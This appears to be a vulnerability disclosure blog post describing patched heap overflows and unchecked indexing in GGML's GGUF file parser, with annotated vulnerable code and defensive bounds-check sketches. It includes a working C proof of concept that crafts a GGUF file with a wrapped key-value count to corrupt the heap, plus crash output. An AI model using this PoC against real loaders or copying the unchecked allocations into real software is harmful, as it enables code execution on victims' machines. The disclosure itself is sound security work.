
The GGUF file format is a binary file format used for storing and loading model weights for the GGML library. The library documentation describes the format as follows:

"GGUF is a file format for storing models for inference with GGML and executors based on GGML. GGUF is a binary format that is designed for fast loading and saving of models, and for ease of reading. Models are traditionally developed using PyTorch or another framework, and then converted to GGUF for use in GGML."

The GGUF format has recently become popular for distributing trained machine learning models, and it is one of the most commonly used formats for Llama-2 when the model is used from a low-level context. Data can reach this loader through several vectors, including llama.cpp, the Python llm module, and the ctransformers library, whenever they load GGUF files such as those hosted on Hugging Face.

The GGML library performs insufficient validation on the input file and therefore contains a number of potentially exploitable memory corruption vulnerabilities in its parsing code. An attacker could leverage these vulnerabilities to execute code on the victim's computer by serving a crafted GGUF file.

In this blog, we will look at some of the heap overflows that are fairly easy to exploit. Since almost no bounds checking is done on the file, there are numerous other cases where allocations are performed with unbounded user input and wrapped values. It is also worth noting that very few return values are checked throughout the code base, including those of memory allocations. All the heap overflows are reachable via the gguf_init_from_file() entry point.

Timeline

  1. Jan 23rd 2024: Vendor contacted, bugs reported
  2. Jan 25th 2024: CVEs requested
  3. Jan 28th 2024: Reviewed fixes in GGML GitHub
  4. Jan 29th 2024: Patches merged into master branch

CVE-2024-25664 Heap Overflow #1: Unchecked KV Count

The entry point to the library, when loading a saved model, is typically via the gguf_init_from_file() function (shown annotated below). This function begins by reading the gguf header from the file before checking for the magic value "GGUF". After this, the key-value pairs within the file are read and parsed.

https://github.com/ggerganov/ggml/blob/faab2af1463aa556899b721289efcbf50c557f55/src/ggml.c#L19215

struct gguf_context * gguf_init_from_file(const char * fname, struct gguf_init_params params) {
    FILE * file = fopen(fname, "rb");
    if (!file) {
        return NULL;
    }
    ...
    gguf_fread_el(file, &magic, sizeof(magic), &offset);
    for (uint32_t i = 0; i < sizeof(magic); i++) {
        if (magic[i] != GGUF_MAGIC[i]) {
            fprintf(stderr, "%s: invalid magic characters '%c%c%c%c'\n",
                    __func__, magic[0], magic[1], magic[2], magic[3]);
            fclose(file);
            return NULL;
        }
    }
    ...
    struct gguf_context * ctx = GGML_ALIGNED_MALLOC(sizeof(struct gguf_context));
    ...
    // read the header
    ...
    strncpy(ctx->header.magic, magic, 4);

    ok = ok && gguf_fread_el(file, &ctx->header.version,   sizeof(ctx->header.version),   &offset);
    ok = ok && gguf_fread_el(file, &ctx->header.n_tensors, sizeof(ctx->header.n_tensors), &offset);
    ok = ok && gguf_fread_el(file, &ctx->header.n_kv,      sizeof(ctx->header.n_kv),      &offset); // File header is read in unchecked
    ...
    // read the kv pairs
    // The size of the buffer that receives each key-value pair struct wraps,
    // so the allocation can be small for a large value of n_kv.
    ctx->kv = malloc(ctx->header.n_kv * sizeof(struct gguf_kv));
    ...
    for (uint64_t i = 0; i < ctx->header.n_kv; ++i) { // Loop terminates on the unchecked n_kv
        // Copy-in target for each array element, running out of bounds of the allocated array.
        struct gguf_kv * kv = &ctx->kv[i];
        ...

The contents of the wrapped allocation are an array of gguf_kv structures, which are used to store key-value pairs of data read from the file. The definition of the structure is as follows:

https://github.com/ggerganov/ggml/blob/faab2af1463aa556899b721289efcbf50c557f55/src/ggml.c#L19133

struct gguf_kv {
     struct gguf_str key;
     enum gguf_type type;
     union gguf_value value;
};

This allows us to overwrite adjacent memory with either data we control using the value field or a pointer to data we control in the case of the key field. These are fairly powerful primitives for heap exploitation. Due to the nature of the parsing, it is also possible to manipulate the heap state in a fairly arbitrary manner. This should also make exploitation easier.

The following PoC code causes an allocation of 0xe0 bytes while n_kv holds the value 0x55555555555555a, which is used as the loop bound for the writes into the chunk. Each write is 0x30 bytes (sizeof(struct gguf_kv)), so the 0x500 kv entries in our file run well past the end of the chunk and smash the adjacent heap memory. To terminate the loop, we simply end the file early, resulting in an EOF read and an error condition. The subsequent use of the heap then trips the allocator's integrity checks because of the overflow, and the process aborts with an error message.

/*
 * GGUF Heap Overflow PoC
 * Databricks AI Security Team
 */

#include <stdint.h>   // uint64_t, used for the fixed-width file fields
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int ac, char **av)
{
   if(ac != 2) {
      printf("usage: %s <filename>\n",av[0]);
      exit(1);
   }
   uint32_t version = 4;
   uint64_t n_tensors = 0;
   uint64_t n_kv = 0x55555555555555a; // n_kv * 0x30 wraps the allocation size to 0xe0
   uint64_t val = 0x4141414141414141; // Value to write out of bounds
   printf("[+] Writing to file: %s\n",av[1]);
   FILE *fp = fopen(av[1],"wb");
   if(!fp) {
      printf("Unable to write out file.\n");
      exit(1);
   } 
   printf("[+] Writing header.\n");
   fwrite("GGUF",4,1,fp); // magic
   fwrite(&version,sizeof(version),1,fp);
   fwrite(&n_tensors,sizeof(n_tensors),1,fp);
   fwrite(&n_kv,sizeof(n_kv),1,fp);
   //struct gguf_kv kv;
   uint64_t n = 4;
   char *key = "foo";
   unsigned int type = 10;   // GGUF_TYPE_UINT64  = 10,
   printf("[+] Writing gguf_kvs.\n");
   // Write  overflow
   for(int i = 0 ; i < 0x500 ; i++) {
     fwrite(&n,sizeof(n),1,fp);
     fwrite(key,strlen(key)+1,1,fp);
     fwrite(&type,sizeof(type),1,fp);
     fwrite(&val,sizeof(val),1,fp);
   }
        
   // EOF Trigger unwind/heap usage
   fclose(fp);
}

Loading the generated file under a debugger produces the following output:

gguf_init_from_file: failed to read key-value pairs
loader(95967,0x1dd2ad000) malloc: *** error for object 0x300000002: pointer being freed was not allocated
loader(95967,0x1dd2ad000) malloc: *** set a breakpoint in malloc_error_break to debug
Process 95967 stopped
* thread #1, stop reason = signal SIGABRT
  frame #0: 0x0000000186a960dc
->  0x186a960dc: b.lo   0x186a960fc
   0x186a960e0: pacibsp 
   0x186a960e4: stp    x29, x30, [sp, #-0x10]!
   0x186a960e8: mov    x29, sp
Target 0: (loader) stopped.
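
The sizes quoted for the PoC can be checked by hand. The short sketch below is illustrative only and is not part of GGML: wrapped_size and elements_that_fit are hypothetical helper names, and 0x30 is the sizeof(struct gguf_kv) value stated above. It reproduces the unsigned 64-bit multiplication that feeds malloc().

```c
#include <stdint.h>

/* Hypothetical helper: the byte count a 64-bit malloc() argument actually
 * receives. Unsigned arithmetic in C wraps modulo 2^64, so the high bits
 * of the true product are silently discarded. */
static uint64_t wrapped_size(uint64_t count, uint64_t elem_size) {
    return count * elem_size;
}

/* Number of whole elements that fit in the wrapped allocation. */
static uint64_t elements_that_fit(uint64_t count, uint64_t elem_size) {
    return elem_size == 0 ? 0 : wrapped_size(count, elem_size) / elem_size;
}
```

With count = 0x55555555555555a and elem_size = 0x30, the true product is 0x100000000000000e0, which truncates to 0xe0. That leaves room for only four 0x30-byte entries, while the loop bound remains 0x55555555555555a.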

CVE-2024-25665 Heap Overflow #2: Reading string types

Another potentially exploitable heap overflow vulnerability exists in the function gguf_fread_str(), which is used repeatedly to read string-type data from the file.

As you can see in the code below, this function reads a length-encoded string directly from the file with no validation. First, the length of the string is read using gguf_fread_el(). Next, an allocation of the arbitrary input size + 1 is performed. By providing a size of 0xffffffffffffffff, the addition causes the value to wrap back to 0. When the allocator receives this size, it returns a chunk of the smallest quantum it supports. Finally, fread() copies data from the file into that chunk using the large, unwrapped size.

https://github.com/ggerganov/ggml/blob/faab2af1463aa556899b721289efcbf50c557f55/src/ggml.c#L19177

static bool gguf_fread_el(FILE * file, void * dst, size_t size, size_t * offset) {
 const size_t n = fread(dst, 1, size, file);
 *offset += n;
 return n == size;
}

static bool gguf_fread_str(FILE * file, struct gguf_str * p, size_t * offset) {
 p->n    = 0;
 p->data = NULL;

 bool ok = true;

 ok = ok && gguf_fread_el(file, &p->n,    sizeof(p->n), offset);
 p->data = calloc(p->n + 1, 1); // allocation wraps
 ok = ok && gguf_fread_el(file,  p->data, p->n,         offset); // overflow

 return ok;
}
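
For contrast, here is a minimal sketch of a length-prefixed string read that rejects the wrapping length and checks the allocation result. It is an illustration under stated assumptions, not the fix that was merged upstream: struct str_sketch and read_str_checked are hypothetical names, and the struct only mirrors the n and data fields used by gguf_fread_str() above.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

/* Local stand-in for a length-prefixed string (assumed layout). */
struct str_sketch {
    uint64_t n;
    char    *data;
};

/* Hypothetical checked variant of a length-prefixed string read. */
static bool read_str_checked(FILE *file, struct str_sketch *p) {
    p->n    = 0;
    p->data = NULL;

    uint64_t n = 0;
    if (fread(&n, 1, sizeof(n), file) != sizeof(n)) {
        return false;
    }
    /* Reject lengths for which n + 1 would wrap or not fit in size_t. */
    if (n >= SIZE_MAX) {
        return false;
    }
    char *data = calloc((size_t) n + 1, 1);
    if (data == NULL) {                 /* allocation failure is checked */
        return false;
    }
    /* The read size equals the size that was allocated (minus the NUL). */
    if (fread(data, 1, (size_t) n, file) != (size_t) n) {
        free(data);
        return false;
    }
    p->n    = n;
    p->data = data;
    return true;
}
```

A length of 0xffffffffffffffff is refused before any allocation happens, and a length larger than the remaining file contents ends in a short read that frees the buffer instead of leaving a dangling pointer.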

CVE-2024-25666 Heap Overflow #3: Tensor count unchecked

A very similar heap overflow to #1 exists when parsing the gguf_tensor_infos in the file. The ctx->header.n_tensors value is unchecked and multiplied once again by the size of a struct, resulting in a wrap and a smaller allocation. Following this, a loop copies each element in turn, resulting in a heap overflow. The code below shows this vulnerability.

https://github.com/ggerganov/ggml/blob/faab2af1463aa556899b721289efcbf50c557f55/src/ggml.c#L19345

// read the tensor infos
{
    // Allocate buffer; the multiplication wraps, resulting in a small allocation.
    ctx->infos = malloc(ctx->header.n_tensors * sizeof(struct gguf_tensor_info));

    for (uint64_t i = 0; i < ctx->header.n_tensors; ++i) {
        // Iterate through the array copying in each element, running out of bounds
        struct gguf_tensor_info * info = &ctx->infos[i];
        ...
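
Both this overflow and #1 come from an unchecked count multiplied by an element size. One common way to guard that pattern is to test the multiplication before allocating, sketched below. This is an assumption about how such a check could look, not the upstream patch, and alloc_array_checked is a hypothetical name.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>

/* Hypothetical helper: allocate `count` elements of `elem_size` bytes,
 * returning NULL instead of a short buffer when the product would wrap. */
static void *alloc_array_checked(uint64_t count, size_t elem_size) {
    if (elem_size != 0 && count > SIZE_MAX / elem_size) {
        return NULL;    /* count * elem_size does not fit in size_t */
    }
    /* calloc zero-fills, so entries that are never parsed hold NULL pointers. */
    return calloc((size_t) count, elem_size);
}
```

The caller still has to check the returned pointer before entering the copy loop. With the PoC's count of 0x55555555555555a and an element size of 0x30, the helper returns NULL rather than a 0xe0-byte chunk.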

CVE-2024-25667 Heap Overflow #4: User-supplied Array Elements

When unpacking the kv values from the file, one of the types that can be unpacked is the array type (GGUF_TYPE_ARRAY). When parsing arrays, the code reads the type of the array, followed by the number of elements of that type. It then multiplies the type size from the GGUF_TYPE_SIZE array with the number of elements to calculate the allocation size to store the data. Once again, since the number of array elements is user-supplied and arbitrary, this calculation can wrap, resulting in a small allocation of memory, followed by a large copy loop. Due to the compact nature of the array data, this provides a very controlled overflow over heap contents, which can be terminated by a failed file read.

https://github.com/ggerganov/ggml/blob/faab2af1463aa556899b721289efcbf50c557f55/src/ggml.c#L19297

case GGUF_TYPE_ARRAY:
    {
        ok = ok && gguf_fread_el(file, &kv->value.arr.type, sizeof(kv->value.arr.type), &offset);
        ok = ok && gguf_fread_el(file, &kv->value.arr.n,    sizeof(kv->value.arr.n),    &offset);
        switch (kv->value.arr.type) {
            ...
            case <types>:
                {
                    kv->value.arr.data = malloc(kv->value.arr.n * GGUF_TYPE_SIZE[kv->value.arr.type]);
                    ok = ok && gguf_fread_el(file, kv->value.arr.data, kv->value.arr.n * GGUF_TYPE_SIZE[kv->value.arr.type], &offset);
                } break;

CVE-2024-25668 Heap Overflow #5: Unpacking kv string type arrays

Another heap overflow issue exists during the array kv unpacking when dealing with arrays of string type. When parsing strings, once again, an element count is read directly from the file unchecked. This value is multiplied by the size of the gguf_str struct, resulting in a wrap and a small allocation relative to n. Following this, a loop is performed up to the n value in order to populate the chunk. This results in an out-of-bounds write of the string struct contents.

https://github.com/ggerganov/ggml/blob/faab2af1463aa556899b721289efcbf50c557f55/src/ggml.c#L19318

case GGUF_TYPE_STRING:
    {
        kv->value.arr.data = malloc(kv->value.arr.n * sizeof(struct gguf_str));
        for (uint64_t j = 0; j < kv->value.arr.n; ++j) {
            ok = ok && gguf_fread_str(file, &((struct gguf_str *) kv->value.arr.data)[j], &offset);
        }
    } break;
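
An element count read from a file can also be sanity-checked against how much of the file is left. The sketch below illustrates that idea and is not GGML code: bytes_remaining and count_is_plausible are hypothetical names. It assumes a seekable stream, and that each serialized string occupies at least 8 bytes (its length prefix, assuming the 64-bit n that gguf_fread_str() reads).

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* Bytes between the current position and the end of a seekable file.
 * Returns false if the stream position cannot be determined. */
static bool bytes_remaining(FILE *file, uint64_t *out) {
    long cur = ftell(file);
    if (cur < 0 || fseek(file, 0, SEEK_END) != 0) {
        return false;
    }
    long end = ftell(file);
    if (end < cur || fseek(file, cur, SEEK_SET) != 0) {
        return false;
    }
    *out = (uint64_t) (end - cur);
    return true;
}

/* Hypothetical plausibility check: n elements that each occupy at least
 * min_bytes in the file cannot exist if fewer than n * min_bytes remain. */
static bool count_is_plausible(FILE *file, uint64_t n, uint64_t min_bytes) {
    uint64_t left = 0;
    if (min_bytes == 0 || !bytes_remaining(file, &left)) {
        return false;
    }
    return n <= left / min_bytes;   /* division avoids a wrapping multiply */
}
```

Calling count_is_plausible(file, kv->value.arr.n, 8) before the allocation would reject the very large counts needed to wrap the multiplication, since no real file is large enough to back them. Note that ftell() returns a long, so on platforms where long is 32 bits a production version would need a 64-bit file offset API instead.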

Unbounded Array Indexing

During the parsing of arrays within the GGUF file, as mentioned above, the required size of a type is determined for allocation via the GGUF_TYPE_SIZE[] array (shown below).

https://github.com/ggerganov/ggml/blob/faab2af1463aa556899b721289efcbf50c557f55/src/ggml.c#L19076

static const size_t GGUF_TYPE_SIZE[GGUF_TYPE_COUNT] = {
 [GGUF_TYPE_UINT8]   = sizeof(uint8_t),
 [GGUF_TYPE_INT8]    = sizeof(int8_t),
 [GGUF_TYPE_UINT16]  = sizeof(uint16_t),
 [GGUF_TYPE_INT16]   = sizeof(int16_t),
 [GGUF_TYPE_UINT32]  = sizeof(uint32_t),
 [GGUF_TYPE_INT32]   = sizeof(int32_t),
 [GGUF_TYPE_FLOAT32] = sizeof(float),
 [GGUF_TYPE_BOOL]    = sizeof(bool),
 [GGUF_TYPE_STRING]  = sizeof(struct gguf_str),
 [GGUF_TYPE_UINT64]  = sizeof(uint64_t),
 [GGUF_TYPE_INT64]   = sizeof(int64_t),
 [GGUF_TYPE_FLOAT64] = sizeof(double),
 [GGUF_TYPE_ARRAY]   = 0, // undefined
};

By indexing into the array, the appropriate size is returned in order to calculate the allocation size via multiplication.

The index used to access this array is read directly from the file and is not sanitized. An attacker could therefore provide an index outside the bounds of the array, returning a size that causes an integer wrap. The resulting value is used in both an allocation and a copy.
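
A bounds check on the type tag before the table lookup closes this hole. The sketch below is a hedged illustration rather than the upstream fix: lookup_type_size is a hypothetical name, and the table is passed in as a parameter so that the example does not depend on GGML's definitions.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Look up an element size for a type tag read from an untrusted file.
 * Returns false for tags outside the table or with no fixed size. */
static bool lookup_type_size(const size_t *table, size_t table_len,
                             uint32_t type_tag, size_t *out_size) {
    if (type_tag >= table_len) {
        return false;   /* would index past the end of the table */
    }
    if (table[type_tag] == 0) {
        return false;   /* e.g. a nested array, which has no fixed size */
    }
    *out_size = table[type_tag];
    return true;
}
```

Treating the tag as unsigned means a negative enum value read from the file is rejected by the same comparison, because it appears as a very large index.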

The following excerpt from the loader demonstrates the vulnerable path:

https://github.com/ggerganov/ggml/blob/faab2af1463aa556899b721289efcbf50c557f55/src/ggml.c#L19300

        ok = ok && gguf_fread_el(file, &kv->value.arr.type, sizeof(kv->value.arr.type), &offset); // Read the type value from the file
        ok = ok && gguf_fread_el(file, &kv->value.arr.n,    sizeof(kv->value.arr.n),    &offset);

        switch (kv->value.arr.type) {
            ...
            {
                // deref the GGUF_TYPE_SIZE array using the arbitrary value.
                kv->value.arr.data = malloc(kv->value.arr.n * GGUF_TYPE_SIZE[kv->value.arr.type]);
                ok = ok && gguf_fread_el(file, kv->value.arr.data, kv->value.arr.n * GGUF_TYPE_SIZE[kv->value.arr.type], &offset);

Conclusion

These vulnerabilities would provide yet another way for an attacker to utilize machine learning models to distribute malware and compromise developers. The security posture of this new and rapidly growing field of research greatly benefits from a more rigorous approach to security review. In that frame, Databricks worked closely with the GGML.ai team, and together we quickly addressed these issues. The patches have been available since commit 6b14d73 which fixes all 6 vulnerabilities discussed in this post.
